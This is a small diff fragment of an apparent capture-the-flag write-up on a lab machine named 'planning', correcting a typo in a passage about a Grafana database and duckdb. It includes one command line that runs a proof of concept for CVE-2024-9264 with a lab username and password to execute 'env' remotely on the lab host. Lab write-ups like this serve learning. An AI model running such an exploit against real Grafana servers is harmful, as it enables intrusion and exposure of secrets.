xirver/xirver.github.io/_posts/2025-09-04-anotherMachine.md

 -rwxr-xr-x 1 root root 49609088 Oct 14  2024 duckdb
 ```

 This confirmed us what type of binaries are available to us.
 Since we located the `grafana.db` file.
-But unfortunately this doesn't seems to be the right path since we the pocs we are not able to access the database informations.
+But unfortunately this doesn't seems to be the right path since with the pocs we are not able to access the database informations.

 `python CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "env" http://grafana.planning.htb`